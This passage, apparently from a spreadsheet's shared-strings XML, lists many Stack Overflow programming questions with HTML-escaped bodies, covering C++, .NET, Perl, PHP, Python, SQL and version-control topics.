&lt;p&gt;If the solution were free in either sense of the word, then that would be great, but it's not really an absolute requirement. In general, the less bloat there is, the better. On the other hand, for reasons beyond this question, I cannot link in any GPL-only code, unfortunately.&lt;/p&gt;
&lt;p&gt;Regarding the file format, I cannot expect my users to start googling for any codecs, but as long as also &lt;em&gt;displaying&lt;/em&gt; the videos is easy enough for a basic-level Windows user, I don't really care what the format is. However, it would be great if it were possible to control the compression quality of the output.&lt;/p&gt;
&lt;p&gt;Just to clarify: I &lt;em&gt;don't&lt;/em&gt; need to capture video from an external device like camcorder, nor am I really interested in mouse movements, even though getting them does not harm either. There are no requirements regarding audio; the application makes no noise whatsoever.&lt;/p&gt;
&lt;p&gt;I write C++ using Visual Studio 2008, for this very application also taking benefit of GLUT and GLUI. I have a solid understanding regarding C++ and linking in libraries and that sort of stuff, but on the other hand OpenGL is quite new for me: so far, I've really only learnt the necessary bits to actually get my job done.&lt;/p&gt;
&lt;p&gt;I don't need a solution super-urgently, so feel free to take your time :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to handle a variable number of parameters in a template class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of callback classes that I use for handling callbacks with variable numbers of parameters. Right now I have about 6 different instances of it to handle differing numbers of arguments. Is there a way to make one instance than can handle a variable number of arguments?? Ultimately I would love to have each parameter be a POD type or a class pointer, or a struct pointer. Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template &amp;lt;class T&amp;gt;
class kGUICallBackPtr
{
public:
    kGUICallBackPtr() {m_obj=0;m_func=0;}
    void Set(void *o,void (*f)(void *,T *));
    inline void Call(T *i) {if(m_func) m_func(m_obj,i);}
    inline bool IsValid(void) {return (m_func!=0);}
private:
    void *m_obj;
    void (*m_func)(void *,T *);
};
template &amp;lt;class T,class U&amp;gt;
class kGUICallBackPtrPtr
{
public:
    kGUICallBackPtrPtr() {m_obj=0;m_func=0;}
    void Set(void *o,void (*f)(void *,T *,U *));
    inline void Call(T *i, U *j) {if(m_func) m_func(m_obj,i,j);}
    inline bool IsValid(void) {return (m_func!=0);}
private:
    void *m_obj;
    void (*m_func)(void *,T *,U *j);
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to tell when an MXML component has totally finished creation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;An MXML component can be quite complex, containing many nested controls, including asynchronously loaded content such as Image/SWFLoader.&lt;/p&gt;
&lt;p&gt;Is there one event I can watch for on my component that will only be raised when every control and sub-component has loaded, including SWFs and Images?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does `$hash{$key} |= {}` do in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wrestling with some Perl that uses hash references.&lt;/p&gt;
&lt;p&gt;In the end it turned out that my problem was the line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$myhash{$key} |= {};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is, "assign $myhash{$key} a reference to an empty hash, unless it already has a value".&lt;/p&gt;
&lt;p&gt;Dereferencing this and trying to use it as a hash reference, however, resulted in interpreter errors about using a string as a hash reference.&lt;/p&gt;
&lt;p&gt;Changing it to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if( ! exists $myhash{$key}) {
  $myhash{$key} = {};
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... made things work.&lt;/p&gt;
&lt;p&gt;So I don't have a &lt;em&gt;problem&lt;/em&gt;. But I'm curious about what was going on.&lt;/p&gt;
&lt;p&gt;Can anyone explain?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I fix connection manager error that causes the package to fail in production?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created an SSIS package and it works great on my dev machine. But, when I try to run it on the production server, it errors out on me.&lt;/p&gt;
&lt;p&gt;Here is the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error: The AcquireConection method call to the connection manager 
"DestinationConnectionOLEDB" failed with error code 0xC0202009.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have figured out the cause, but am not sure how to get it fixed. The password isn't in the connection string. But I have set the password in the SSIS project. For some reason though, when I deploy and run this on the production server, it won't run since the password isn't part of the connection string.&lt;/p&gt;
&lt;p&gt;Is there some setting in the SSIS project that I need to change in order to get this to work right?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Novell client and windows SSO</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does the novell gina install a specific security provider that can be used via SSPI?  Does it have to called out specifically or is SPNEGO good enough?  Will that support single sign on if the novell gina is installed on the remote server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Separator attribute not working in SolPartMenu on DotNetNuke skin.ascx</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can get rootmenuitemlefthtml and rootmenuitemrighthtml to emit but not separator. Tried CDATA wrapping and setting SeparatorCssClass. I just want pipes between root menu items.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;dnn:SOLPARTMENU runat="server" id="dnnSOLPARTMENU" Separator="&amp;lt;![CDATA[|]]&amp;gt;" SeparatorCssClass="MainMenu_SeparatorCSS"
		usearrows="false" 
		userootbreadcrumbarrow="false" usesubmenubreadcrumbarrow="false"
		rootmenuitemlefthtml="&amp;amp;nbsp;&amp;amp;lt;span&amp;amp;gt;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;" rootmenuitemrighthtml="&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;lt;/span&amp;amp;gt;" rootmenuitemcssclass="rootmenuitem"
		rootmenuitemselectedcssclass="rootmenuitemselected" rootmenuitembreadcrumbcssclass="rootmenuitembreadcrumb"
		submenucssclass="submenu" submenuitemselectedcssclass="submenuitemselected" submenuitembreadcrumbcssclass="submenuitembreadcrumb"
		CSSNodeSelectedRoot="rootmenuitembreadcrumb" CSSNodeSelectedSub="submenuitembreadcrumb"
		MouseOverAction="False" MouseOutHideDelay="0"
		delaysubmenuload="true" level="Root" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Dynamic SQL - Search Query - Variable Number of Keywords</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are trying to update our classic asp search engine to protect it from SQL injection.  We have a VB 6 function which builds a query dynamically by concatenating a query together based on the various search parameters.  We have converted this to a stored procedure using dynamic sql for all parameters except for the keywords.&lt;/p&gt;
&lt;p&gt;The problem with keywords is that there are a variable number words supplied by the user and we want to search several columns for each keyword. Since we cannot create a separate parameter for each keyword, how can we build a safe query?&lt;/p&gt;
&lt;p&gt;Example&lt;/p&gt;
&lt;p&gt;@CustomerId AS INT
@Keywords AS NVARCHAR(MAX)&lt;/p&gt;
&lt;p&gt;@sql = 'SELECT event_name FROM calendar WHERE customer_id = @CustomerId '&lt;/p&gt;
&lt;p&gt;--(loop through each keyword passed in and concatenate)&lt;/p&gt;
&lt;p&gt;@sql = @sql + 'AND (event_name LIKE ''%' + @Keywords + '%'' OR event_details LIKE ''%' + @Keywords + '%'')'&lt;/p&gt;
&lt;p&gt;EXEC sp_executesql @sql N'@CustomerId INT, @CustomerId = @CustomerId&lt;/p&gt;
&lt;p&gt;What is the best way to handle this and maintaining protection from SQL injection? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help me understand how QA works in Scrum</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Apparently we use the Scrum development methodology. Here's generally how it goes: &lt;/p&gt;
&lt;p&gt;Developers thrash around trying to accomplish their tasks. Generally the tasks take most of the sprint to complete. QA pesters Dev to release something they can test, Dev finally throws some buggy code out to QA a day or two before the sprint ends and spends the rest of the time fixing bugs that QA is finding. QA can never complete the tasks on time, sprints are rarely releasable on time, and Dev and QA have a miserable few days at the end of the sprint.&lt;/p&gt;
&lt;p&gt;How is scrum supposed to work when releasable Dev tasks take up most of the sprint? &lt;/p&gt;
&lt;p&gt;Thank you everyone for your part in the discussion. As it's a pretty open-ended question, it doesn't seem like there is one "answer" - there are many good suggestions below. I'll attempt to summarize some of my "take home" points and make some clarifications.&lt;/p&gt;
&lt;p&gt;(BTW - Is this the best place to put this or should I have put it in an 'answer'?)&lt;/p&gt;
&lt;p&gt;Points to ponder / act on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Need to ensure that developer tasks are as small (granular) as possible.&lt;/li&gt;
&lt;li&gt;Sprint length should be appropriately based on average task length (e.g. sprint with 1 week tasks should be at least 4 weeks long)&lt;/li&gt;
&lt;li&gt;Team (including QA) needs to work on becoming more accurate at estimating.&lt;/li&gt;
&lt;li&gt;Consider doing a separate QA sprint in parallel but off-set if that works best for the team&lt;/li&gt;
&lt;li&gt;Unit testing!&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What is the "&lt; &gt;" syntax within C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been learning about the basics of C# but haven't come across a good explanation of what this is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var l = new List&amp;lt;string&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't know what the &lt;code&gt;&amp;lt;string&amp;gt;&lt;/code&gt; is doing or if it's the &lt;code&gt;List&lt;/code&gt; that is doing the magic. I have also seen objects been thrown within the &lt;code&gt;&amp;lt; &amp;gt;&lt;/code&gt; tags.&lt;/p&gt;
&lt;p&gt;Can someone explain this to me with examples, please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>FIPS compliant password encryption for .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've working on a WinForms in VB.NET (3.5) application that requires the user to enter domain administrator credentials. To make things easier on the user, they should only have to enter the user name and password once, and then just rely on my app to save these credentials. I'd like to save these credentials with the other user settings, but for security reasons, the password needs to be encrypted.&lt;/p&gt;
&lt;p&gt;What's an easy way to encrypt and decrypt this password? I'm wanting the encryption method to be FIPS compatible. The methods I've tried so far result in this exception:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.InvalidOperationException: This
  implementation is not part of the
  Windows Platform FIPS validated
  cryptographic algorithms.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>LINQ Submit Changes not submitting changes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using LINQ to SQL and C#.  I have two LINQ classes: User and Network.  &lt;/p&gt;
&lt;p&gt;User has UserID (primary key) and NetworkID&lt;/p&gt;
&lt;p&gt;Network has NetworkID (primary key) and an AdminID (a UserID)&lt;/p&gt;
&lt;p&gt;The following code works fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;user.Network.AdminID = 0;
db.SubmitChanges();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if I access the AdminID before making the change, the change never happens to the DB.  So the following doesn't work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(user.Network.AdminID == user.UserID)
{
     user.Network.AdminID = 0;
     db.SubmitChanges();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is making it into the if statement and calling submit changes.  For some reason, the changes to AdminID never make it to the DB.  No error thrown, the change just never 'takes'.&lt;/p&gt;
&lt;p&gt;Any idea what could be causing this?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OS-independent API to monitor file system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to experiment with ideas about distributed file synchronization/replication. To make it efficient when the user is working, I would like to implement some kind of daemon to monitor changes in some directory (e.g. /home/user/dirToBeMonitored or c:\docs and setts\user\dirToBeMonitored). So, I could be able to know which filename was added/changed/deleted at every time (or within a reasonable interval).&lt;/p&gt;
&lt;p&gt;Is this possible with any high-medium level language?. Do you know some API (and in which language?) to do this?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I tell when .Net System.Diagnostics.Process ran sucessfully or failed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a scheduler or sorts.  It's basically a table with a list of exes (like "C:\a.exe") and a console app that looks at the records in the table every minute or so and runs the tasks that haven't been run yet.&lt;/p&gt;
&lt;p&gt;I run the tasks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.FileName = someExe; // like "a.exe"
p.Start();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I tell if a particular task failed?  For example what if a.exe throws an unhandled exception?  I'd like the above code to know when this happens and update the tasks table with something like "the particular task failed" etc.&lt;/p&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
&lt;p&gt;p.s.  I'm not using the Sql Agent or the Windows Scheduler because someone else told me not to.  He has more "experience" so I'm basically just following orders.  Feel free to suggest alternatives.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a function in Delphi to get the current executing thread?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want a function like GetCurrentThread which returns a TThread object of the current executing thread. I know there is a Win32 API call GetCurrentThread, but it returns the thread Id. If there is a possibility to get TThread object from that ID that's also fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I specify the exit code of a console application in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a trivial console application in .NET. It's just a test part of a larger application. I'd like to specify the "exit code" of my console application. How do I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Invert 4x4 matrix - Numerical most stable solution needed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to invert a 4x4 matrix. My numbers are stored in fixed-point format (1.15.16 to be exact).&lt;/p&gt;
&lt;p&gt;With floating-point arithmetic I usually just build the adjoint matrix and divide by the determinant (e.g. brute force the solution). That worked for me so far, but when dealing with fixed point numbers I get an unacceptable precision loss due to all of the multiplications used. &lt;/p&gt;
&lt;p&gt;Note: In fixed point arithmetic I always throw away some of the least significant bits of immediate results.&lt;/p&gt;
&lt;p&gt;So - What's the most numerical stable way to invert a matrix? I don't mind much about the performance, but simply going to floating-point would be to slow on my target architecture.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Remote print module in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on an application that will sport a web-based point of sale interface.&lt;/p&gt;
&lt;p&gt;The point of sale PC (I am not sure as of now whether it will run on Linux or Windows) must have a fiscal printer attached to it, but like any web app, it is the server which processes all stuff. Both server and PoS machines are on the same LAN.&lt;/p&gt;
&lt;p&gt;I must send the sale data in real time, and via the fiscal printer which uses the serial port, so printing a PDF or even a web page is not an option.&lt;/p&gt;
&lt;p&gt;I've been told I could have a little app listening on web services on the client, which in turn talks to the printer instead of the server or the browser, but don't have a clue how to do it. Also, I'll most likely need to listen to any printer feedback (coupon number, for instance, which is generated by the printer) and hand it back to the server.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Safehandle in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is SafeHandle? how does it differ from IntPtr? When should I use one? What are its advantages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I configure visual studio to use the code view as the default view for Webservices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you double click on a class (in 'solution explorer')... if that class happens to be an .asmx.cs webservice... then you get this...&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;To add components to your class, drag
  them from the Toolbox and use
  the Properties window to set their
  properties. To create methods and
  events for your class, click here
  to switch to code view.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;...it's a 'visual design surface' for webservices.&lt;/p&gt;
&lt;p&gt;(Who actually uses that surface to write webservices?)&lt;/p&gt;
&lt;p&gt;So what I want to know, how do I configure visual studio to never show me that design view?&lt;/p&gt;
&lt;p&gt;Or at least, to show me the code view by default?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I declare an impicitly typed variable in VB inline in an ASP.Net page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do the following but in VB: &lt;/p&gt;
&lt;p&gt;&amp;lt;%=var t = ViewData.Model%&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Session data not being saved</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have one of those "I swear I didn't touch the server" situations. I honestly didn't touch any of the php scripts. The problem I am having is that php data is not being saved across different pages or page refreshes. I know a new session is being created correctly because I can set a session variable (e.g. $_SESSION['foo'] = "foo" and print it back out on the same page just fine. But when I try to use that same variable on another page it is not set! Is there any php functions or information I can use on my hosts server to see what is going on?&lt;/p&gt;
&lt;p&gt;Here is an example script that does not work on my hosts' server as of right now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
session_start();
if(isset($_SESSION['views']))
    $_SESSION['views'] = $_SESSION['views']+ 1;
else
    $_SESSION['views'] = 1;
echo "views = ". $_SESSION['views'];
echo '&amp;lt;p&amp;gt;&amp;lt;a href="page1.php"&amp;gt;Refresh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;';
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The 'views' variable never gets incremented after doing a page refresh. I'm thinking this is a  problem on their side, but I wanted to make sure I'm not a complete idiot first.&lt;/p&gt;
&lt;p&gt;Here is the phpinfo() for my hosts' server (PHP Version 4.4.7):
&lt;img src="http://i.stack.imgur.com/3bv0K.png" alt="alt text"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Launch web page from my application in Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that launches a webpage in the "current" browser when the user selects it. This part of my app works fine in the Windows version but I can't figure out how to do this in Linux build.&lt;/p&gt;
&lt;p&gt;Right now the Linux version is hardcoded for Firefox in a specific directory and runs a new instance of it each time and doesn't show the URL that I pass in. I would like it to NOT launch a new version each time but just open a new page in the current open one if it is already running. &lt;/p&gt;
&lt;p&gt;For windows I use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ShellExecute(NULL,"open",filename,NULL,NULL,SW_SHOWNORMAL);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For Linux I currently use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pid_t pid;
char *args[2];
char *prog=0;
char firefox[]={"/usr/bin/firefox"};
if(strstri(filename,".html"))
    prog=firefox;
if(prog)
{
    args[0]=(char *)filename;
    args[1]=0;
    pid=fork();
    if(!pid)
        execvp(prog,args);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Source code management strategies - branching, tagging, forking, etc. - for web apps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This posting here (&lt;a href="http://stackoverflow.com/questions/156044/how-do-you-manage-database-revisions-on-a-medium-sized-project-with-branches"&gt;http://stackoverflow.com/questions/156044/how-do-you-manage-database-revisions-on-a-medium-sized-project-with-branches&lt;/a&gt;) got me wondering how best to work on a web project using branching and deploying to dev, staging, and production (along with local copies).&lt;/p&gt;
&lt;p&gt;We don't have "releases" per se: if a feature is big enough to be noticeable, we push it live (after requisite testing/etc.), otherwise we batch a few up and, when it feels "comfortable", push those live. The goal is to never have a deploy more than once or twice a month or so because a constantly shifting site tends to make the users a bit uneasy.&lt;/p&gt;
&lt;p&gt;Here's how we do it, and it feels sort of brittle (currently using svn but considering a switch to git):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Two "branches" - DEV and STAGE with a given release of STAGE marked as TRUNK&lt;/li&gt;
&lt;li&gt;Developer checks out a copy of TRUNK for every change and creates a branch for it&lt;/li&gt;
&lt;li&gt;Developer works locally, checking in code frequently (just like voting: early and often)&lt;/li&gt;
&lt;li&gt;When Developer is comfortable it isn't totally broken, merge the branch with DEV and deploy to the development site.&lt;/li&gt;
&lt;li&gt;Repeat 3-4 as necessary until the change is "finished"&lt;/li&gt;
&lt;li&gt;Merge change branch with STAGING, deploy to stage site. Do expected final testing.&lt;/li&gt;
&lt;li&gt;After some period of time, mark a given revision of STAGE as the TRUNK, and push trunk live&lt;/li&gt;
&lt;li&gt;Merge TRUNK changes back down to DEV to keep it in sync&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, some of these steps have significant complexity hand-waved away and in practice are very difficult to do (TRUNK -&gt; DEV always breaks) so I have to imagine there's a better way.&lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python Dependency Injection Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a framework equivalent to Guice (&lt;a href="http://code.google.com/p/google-guice"&gt;http://code.google.com/p/google-guice&lt;/a&gt;) for Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Mercurial, is there an easy way to diff my working copy with the tip file in the default remote repository</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using mercurial, I'd like to be able to diff the working copy of a file with the tip file in my default remote repository.  Is there an easy way to do this?&lt;/p&gt;
&lt;p&gt;I know I can do an "hg incoming -p" to see the patch sets of changes coming in, but it'd be nice to just directly see the actual changes for a particular file that I'd get if I do a pull of the latest stuff (or what I might be about put push out).&lt;/p&gt;
&lt;p&gt;The easiest thing I can think of right now is to create a little script that takes a look at the default location in .hg/hgrc and downloads the file using curl (if it's over http, otherwise scp it over ssh, or just do a direct diff if it's on the local file system) and then to diff the working copy or the tip against that temporary copy.&lt;/p&gt;
&lt;p&gt;I'm trying to sell mercurial to my team, and one of my team members brought this up today as something that they're able to do easily in SVN with their GUI tools.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get timer ticks in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just trying to time a piece of code. The pseudocode looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;start = get_ticks()
do_long_code()
print "It took " + (get_ticks() - start) + " seconds."
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How does this look in Python?&lt;/p&gt;
&lt;p&gt;More specifically, how do I get the number of ticks since midnight (or however Python organizes that timing)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get all items from thread Queue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have one thread that writes results into a Queue.&lt;/p&gt;
&lt;p&gt;In another thread (GUI), I periodically (in the IDLE event) check if there are results in the queue, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def queue_get_all(q):
    items = []
    while 1:
        try:
            items.append(q.get_nowait())
        except Empty, e:
            break
    return items
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this a good way to do it ? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;I'm asking because sometimes the
  waiting thread gets stuck for a few
  seconds without taking out new
  results.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The "stuck" problem turned out to be because I was doing the processing in the idle event handler, without making sure that such events are actually generated by calling &lt;code&gt;wx.WakeUpIdle&lt;/code&gt;, as is recommended.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regexp recognition of email address hard?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently read somewhere that writing a regexp to match an email address, taking into account all the variations and possibilities of the standard is extremely hard and is significantly more complicated than what one would initially assume.&lt;/p&gt;
&lt;p&gt;Can anyone provide some insight as to why that is?  &lt;/p&gt;
&lt;p&gt;Are there any known and proven regexps that actually do this fully?&lt;/p&gt;
&lt;p&gt;What are some good alternatives to using regexps for matching email addresses?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write an Excel workbook to a MemoryStream in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I write an Excel workbook to a &lt;code&gt;MemoryStream&lt;/code&gt; without first saving it to the file system?&lt;/p&gt;
&lt;p&gt;All options within the &lt;code&gt;Microsoft.Office.Interop.Excel.WorkBook&lt;/code&gt; save options take a filename.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Increase Stack Size on Windows (GCC)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to increase the stack size of a Windows application at compile/link time with GCC?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to handle English and Chinese in a Flex application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a requirement to be able to provide a flex component in English and several asian languages.  I have looked at the flex documentation and it seems that I have to build several swf's, which feels wrong.  &lt;/p&gt;
&lt;p&gt;Does anyone know of a straightforward and practical way of bundling string resources in different languages and handling the fonts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the last element in a loop deserve a separate treatment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When reviewing, I sometimes encounter this kind of loop:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i = begin
while ( i != end ) {    
   // ... do stuff
   if ( i == end-1 (the one-but-last element) ) {
      ... do other stuff
   }
   increment i
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I ask the question: would you write this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i = begin
mid = ( end - begin ) / 2 // (the middle element)
while ( i != end ) {    
   // ... do stuff
   if ( i &amp;gt; mid ) {
      ... do other stuff
   }
   increment i
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my opinion, this beats the intention of writing a loop: you loop because there is something common to be done for each of the elements.  Using this construct, for some of the elements you do something different.  So, I conclude, you need a separate loop for those elements:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i = begin
mid = ( end - begin ) / 2 //(the middle element)
while ( i != mid ) {    
   // ... do stuff
   increment i
}
while ( i != end ) {
   // ... do stuff
   // ... do other stuff
   increment i
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I even saw a &lt;a href="http://stackoverflow.com/questions/151046/c-last-loop-iteration-stl-map-iterator"&gt;question&lt;/a&gt; on SO on how to write the &lt;code&gt;if&lt;/code&gt;-clause in a nice way...  And I got sad: something isn't right here.&lt;/p&gt;
&lt;p&gt;Am I wrong?  If so, what's so good about cluttering the loop body with special cases, which you are aware of upfront, at coding time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you like/dislike about development user groups?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I run a non profit based .net user group called DevEvening (&lt;a href="http://www.devevening.co.uk" rel="nofollow"&gt;http://www.devevening.co.uk&lt;/a&gt;) and am always looking to improve it. &lt;/p&gt;
&lt;p&gt;I wondered what people liked and disliked about user groups and what could persuade people to attend who did not already? &lt;/p&gt;
&lt;p&gt;Since your using this site I guess you have some outside of work interest in development - do you attend user groups?&lt;/p&gt;
&lt;p&gt;I have been to a number of events and different user groups and although the quality of presentations etc have been mixed I find it is always interesting and useful talking to other developers. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hooking up Reporting Services 2005SP2 to SQL Server 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to configure Reporting Services 2005SP2 on a machine with SQL 2008 on another hosting the ReportServer DB.&lt;/p&gt;
&lt;p&gt;When I create the ReportServerDB the DB is created as version C.0.9.45:&lt;/p&gt;
&lt;p&gt;When, afterwards, I try to initialise Reporting Services, I get an error about an incorrect version number. Reporting Services created a ReportServer DB version C.0.9.45 but now expects a version C.0.8.54.&lt;/p&gt;
&lt;p&gt;Changing compatibility settings of the DB doesnâ€™t have an effect. And changing the version number sproc in the DB to return what Reporting Services wants to hear only delays the crash until initialisation has started.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any website which showcase nice / comprehensive build.xml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What i mean exactly is that build.xml that actually included those plugins like findbugs etc. Or nicely done build.xml &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight display problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a nice silverlight control doing exactly what I want it to do, and it looks great :) When I host it in the test projects ASPX sample file or the HTML sample file it shows up nicely.&lt;/p&gt;
&lt;p&gt;I now have to use the control in my existing ASP.NET 2.0 project, which has a fancy design. The problem I'm having is that the control don't show up exactly how it should:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The loading progress don't show&lt;/li&gt;
&lt;li&gt;The control usually don't become visible before I move my mouse over the aria where it's contained&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Obviously it's something with my HTML/CSS design causing this, but it will be extremely time consuming to find the issue - so does anyone have knowledge in this area? What are the rules around how to make sure the control is displayed properly? What CSS properties should be used?&lt;/p&gt;
&lt;p&gt;PS: Since I have a 2.0 app, I'm using the object tag approach to Silverlight, and it's contained in a DIV with height and width set in style.&lt;/p&gt;
&lt;p&gt;Code snippet was requested. It's something like this (basically a copy of the HTML test page from the silverlight test project (which work perfectly)):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="silverlightControlHost" style="height: 300px; width: 750px;"&amp;gt;
    &amp;lt;object data="data:application/x-silverlight," type="application/x-silverlight-2-b2"
    width="100%" height="100%"&amp;gt;
    &amp;lt;param name="source" value="Contiki.SilverLight.FileUploader.xap" /&amp;gt;
    &amp;lt;param name="onerror" value="onSilverlightError" /&amp;gt;
    &amp;lt;param name="background" value="white" /&amp;gt;                            
